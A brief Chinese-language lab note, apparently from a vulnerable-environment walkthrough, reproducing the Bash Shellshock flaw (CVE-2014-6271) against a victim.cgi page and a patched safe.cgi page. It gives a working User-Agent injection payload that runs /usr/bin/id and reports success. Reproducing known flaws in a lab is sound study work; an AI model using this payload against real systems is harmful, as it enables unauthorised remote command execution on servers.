CVE-2014-6271(Bash Shellshock远程命令注入漏洞)

        该服务启动后有路径http://your-ip:port/victim.cgi和http://your-ip:port/safe.cgi。其中safe.cgi是新版页面，victim是bash4.3生成的页面。

漏洞位置在User-Agent中victim.cgi:

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

成功执行命令

更换新版路径测试